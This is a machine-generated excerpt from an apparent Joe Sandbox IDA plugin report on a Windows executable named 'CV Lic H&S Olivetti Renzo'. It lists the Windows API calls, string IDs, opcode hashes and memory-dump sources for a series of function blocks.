                                                                                        • Instruction Fuzzy Hash: 25313D71C10219ABCF02EFE4DC45AEE7FB9FF14750F100056F815AA266DB316A06DB60
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003EA15E
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003EA172
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 003EA196
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: SysMonthCal32
                                                                                        • API String ID: 2326795674-1439706946
                                                                                        • Opcode ID: bcc2980f6da4fbce55820c638230e88ea07ec7c1ed35a44e2c32c57b3038b4bd
                                                                                        • Instruction ID: e4636621c4eb2f774f170dd7f24c2da2e218e8707c5d160523317c5be18deafe
                                                                                        • Opcode Fuzzy Hash: bcc2980f6da4fbce55820c638230e88ea07ec7c1ed35a44e2c32c57b3038b4bd
                                                                                        • Instruction Fuzzy Hash: F421A132510228ABDF128F94CC86FEA3B79EF48754F110214FE55AB1D0D6B5BC55CB94
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003EA941
                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003EA94F
                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003EA956
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                        • String ID: msctls_updown32
                                                                                        • API String ID: 4014797782-2298589950
                                                                                        • Opcode ID: f835de6c8695caa72b7da252535d174ecb6861c7bae7a1b1a501fc0870b7122c
                                                                                        • Instruction ID: 6f4d5f9f848b46304b2bd4d425af1fbacd7ca15c162349b6cf90317bd27f6993
                                                                                        • Opcode Fuzzy Hash: f835de6c8695caa72b7da252535d174ecb6861c7bae7a1b1a501fc0870b7122c
                                                                                        • Instruction Fuzzy Hash: 1021B0B5600619AFDB02DF29CC81D7737ADEB4A3A4B060159FA049B3A2CB31FC118B61
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003E9A30
                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003E9A40
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003E9A65
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MoveWindow
                                                                                        • String ID: Listbox
                                                                                        • API String ID: 3315199576-2633736733
                                                                                        • Opcode ID: d16b083a5fbdbc250432d552367ad911346ea4fbb4e2f4c269195f99424d0a57
                                                                                        • Instruction ID: 2fba609791df38b13893ad873f20ddda8cc197f5645aa20623f8b426debf6707
                                                                                        • Opcode Fuzzy Hash: d16b083a5fbdbc250432d552367ad911346ea4fbb4e2f4c269195f99424d0a57
                                                                                        • Instruction Fuzzy Hash: 8F21C532610168BFDF128F55CC85FBB3BAAEF89750F02822AF9445B1E0C7719C5187A0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003EA46D
                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003EA482
                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003EA48F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: msctls_trackbar32
                                                                                        • API String ID: 3850602802-1010561917
                                                                                        • Opcode ID: 7f56ac822c584f08150d8617c08dae3d5af469d2e1a7df46f77bc09c968436d8
                                                                                        • Instruction ID: 942e375342a4e30e80c0d6e39ebe2fa471a43620f6706ac1195018e13823a46b
                                                                                        • Opcode Fuzzy Hash: 7f56ac822c584f08150d8617c08dae3d5af469d2e1a7df46f77bc09c968436d8
                                                                                        • Instruction Fuzzy Hash: 73110A71200258BEEF215F66CC46FEB376DEF89754F024228FA45A61E1D6B2F811CB24
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,003A2350,?), ref: 003A22A1
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 003A22A8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RoInitialize$combase.dll
                                                                                        • API String ID: 2574300362-340411864
                                                                                        • Opcode ID: 9bd7b0666b8a2142001367eef9e728555401fd95f40a9f549c7d06784562845d
                                                                                        • Instruction ID: 13eed7114acd1784a07ad0ec3d7f4b65f018f1535ee803ca7fb9386a7597d454
                                                                                        • Opcode Fuzzy Hash: 9bd7b0666b8a2142001367eef9e728555401fd95f40a9f549c7d06784562845d
                                                                                        • Instruction Fuzzy Hash: A7E04F74AA0300ABEB605FB4ED4DB153664F702706F104434F282E50E0CFBA4068CF0C
                                                                                        APIs
                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,003A2276), ref: 003A2376
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 003A237D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                        • API String ID: 2574300362-2819208100
                                                                                        • Opcode ID: 7d63a58ef773a0482cb4ced2cd9272983ac1c30b10f4120b052cdfdb79d8cb4a
                                                                                        • Instruction ID: 8ce2f23b4c0b4b7d1c22f0fa5e650eab655f2878346935d5f2c2424a760ce690
                                                                                        • Opcode Fuzzy Hash: 7d63a58ef773a0482cb4ced2cd9272983ac1c30b10f4120b052cdfdb79d8cb4a
                                                                                        • Instruction Fuzzy Hash: D6E0EC78A84300AFDB25AFA1EE0EB053A75B716706F110434F249E20F0CBBA9428DB1C
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: LocalTime__swprintf
                                                                                        • String ID: %.3d$WIN_XPe
                                                                                        • API String ID: 2070861257-2409531811
                                                                                        • Opcode ID: b5a27356906c2607003593f586bbb53cbc1f7d614cab9a14dac81e3b86b18537
                                                                                        • Instruction ID: a394c2b73b960f50a19c6889997eeb631c25d4999743368eeb7700dd0d4a8e7c
                                                                                        • Opcode Fuzzy Hash: b5a27356906c2607003593f586bbb53cbc1f7d614cab9a14dac81e3b86b18537
                                                                                        • Instruction Fuzzy Hash: AFE012F1804A1CDBCB139790CE05DFAB3BCA708781F1000D2FA0AE1900D7359B88AA17
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,003E21FB,?,003E23EF), ref: 003E2213
                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 003E2225
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetProcessId$kernel32.dll
                                                                                        • API String ID: 2574300362-399901964
                                                                                        • Opcode ID: 2653433d3836fccddafd7c2e06dc6fb470e584a4ad112211eefbe40f0ac7c634
                                                                                        • Instruction ID: 852fa592a79d3ce813a1123556fc3fc54dce255e5706f23ad8aa9bff31023b94
                                                                                        • Opcode Fuzzy Hash: 2653433d3836fccddafd7c2e06dc6fb470e584a4ad112211eefbe40f0ac7c634
                                                                                        • Instruction Fuzzy Hash: 08D0A735C007269FC7225F71F90974276D8EB0C305F11583AED51F2190DBB4D8848664
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003842EC,?,003842AA,?), ref: 00384304
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00384316
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-1355242751
                                                                                        • Opcode ID: 8536b3447bfb09e181492b8da7299f432daaca79d605e751cd23fa388a07f4cc
                                                                                        • Instruction ID: effa76e2ec87f8be4353db33afed92bc74ca3854c47bbfe3bcc6c4ddd750c24b
                                                                                        • Opcode Fuzzy Hash: 8536b3447bfb09e181492b8da7299f432daaca79d605e751cd23fa388a07f4cc
                                                                                        • Instruction Fuzzy Hash: 51D0A7748007139FC7216F60E80D70176D4AF08302F11447AF841E2564DBF4C8848754
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,003841BB,00384341,?,0038422F,?,003841BB,?,?,?,?,003839FE,?,00000001), ref: 00384359
                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0038436B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                        • API String ID: 2574300362-3689287502
                                                                                        • Opcode ID: c3166e95979471430901b13fe50e6645d6d7e8c1463ce92bfca4a26d0f8c00c3
                                                                                        • Instruction ID: 0c2ec037e89c4d355bb066c7d5e8f9f1d44cc9cd8fe96f8f90c0c32cfaec0ab1
                                                                                        • Opcode Fuzzy Hash: c3166e95979471430901b13fe50e6645d6d7e8c1463ce92bfca4a26d0f8c00c3
                                                                                        • Instruction Fuzzy Hash: A5D0A7748007139FC7216FB0E90970176D4AF18716F21447AE881E2550DBF4D8848B54
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,003C051D,?,003C05FE), ref: 003C0547
                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 003C0559
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                        • API String ID: 2574300362-1071820185
                                                                                        • Opcode ID: c038332d99ccc43a836966a1471d760987a2f2c00583d7453768d16a63d0138d
                                                                                        • Instruction ID: 71969576ba48527b45a11a3bb928da782ddf5739d4cb937e5555c19d1dba9c6d
                                                                                        • Opcode Fuzzy Hash: c038332d99ccc43a836966a1471d760987a2f2c00583d7453768d16a63d0138d
                                                                                        • Instruction Fuzzy Hash: D7D0A730808722DFC7208F60E908B45B6E4AB09301F21C43EE846E2254DAB4CC848B54
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,003C052F,?,003C06D7), ref: 003C0572
                                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 003C0584
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                        • API String ID: 2574300362-1587604923
                                                                                        • Opcode ID: 1d2cc34756ae61cc8f0b40b68aca4b5193210c2b39c871450ef74f9979d17219
                                                                                        • Instruction ID: ef072d938c2ec84088d5776005cb91cf99c2e9bf855f82b341162e08de84e678
                                                                                        • Opcode Fuzzy Hash: 1d2cc34756ae61cc8f0b40b68aca4b5193210c2b39c871450ef74f9979d17219
                                                                                        • Instruction Fuzzy Hash: BFD0A731848312DFCB205F74E948F02B7E4AB09300F21853EEC41E2154DBB4C8C48B64
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,003DECBE,?,003DEBBB), ref: 003DECD6
                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 003DECE8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                        • API String ID: 2574300362-1816364905
                                                                                        • Opcode ID: 3367daf319d3cb5a3eb5a17c14b0ae458045a3f56420953d076b01c07991d46d
                                                                                        • Instruction ID: f216f521ab5c7b9444e2730e867618d46023044cd81695636a2331b56f664f00
                                                                                        • Opcode Fuzzy Hash: 3367daf319d3cb5a3eb5a17c14b0ae458045a3f56420953d076b01c07991d46d
                                                                                        • Instruction Fuzzy Hash: B4D0A7318107239FCB216FA0F9497427AF4AB08300F11843BFC45E7254DFB4D8848654
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,003DBAD3,00000001,003DB6EE,?,0041DC00), ref: 003DBAEB
                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003DBAFD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                        • API String ID: 2574300362-199464113
                                                                                        • Opcode ID: 8b1a3a84cd4136cc8ee158ff78fd5038814951b6a2d95bc7d1d5df58986abefe
                                                                                        • Instruction ID: 43eca529e0a35dbce7a4a07ba4f9cb919572875c8160695e8f8aebf0b768f50c
                                                                                        • Opcode Fuzzy Hash: 8b1a3a84cd4136cc8ee158ff78fd5038814951b6a2d95bc7d1d5df58986abefe
                                                                                        • Instruction Fuzzy Hash: 90D0A731D04712DFC7315F60F94AB55B6E4AB09300F12443BE843E2254DBB4D884C658
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,003E3BD1,?,003E3E06), ref: 003E3BE9
                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003E3BFB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressLibraryLoadProc
                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                        • API String ID: 2574300362-4033151799
                                                                                        • Opcode ID: b8f390992bc7161d372f0eb879f36682b887d6073f47c47fe5909091763adac5
                                                                                        • Instruction ID: 60d9223d5d5378114945c98169255ba06620421a6f57f4ed1dd90c5fe78a0c48
                                                                                        • Opcode Fuzzy Hash: b8f390992bc7161d372f0eb879f36682b887d6073f47c47fe5909091763adac5
                                                                                        • Instruction Fuzzy Hash: CED0A7B08007629FC7205FE5E90D783BAF4AB09324F31443AE845F3190DAB8D8848E54
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a75baaae645a5cd7dfcd8bd319b3733085cf72e82ea25c139675e6c37f196974
                                                                                        • Instruction ID: fb1c17083c26c3bbf1b2f9a36a94ac90299554bb9a33e2a74745704a39f991be
                                                                                        • Opcode Fuzzy Hash: a75baaae645a5cd7dfcd8bd319b3733085cf72e82ea25c139675e6c37f196974
                                                                                        • Instruction Fuzzy Hash: 04C16C75A0021AEFCB15CF94C884BEEBBB5FF48708F118599EA05AB651D730DE41DB90
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 003DAAB4
                                                                                        • CoUninitialize.OLE32 ref: 003DAABF
                                                                                          • Part of subcall function 003C0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003C027B
                                                                                        • VariantInit.OLEAUT32(?), ref: 003DAACA
                                                                                        • VariantClear.OLEAUT32(?), ref: 003DAD9D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
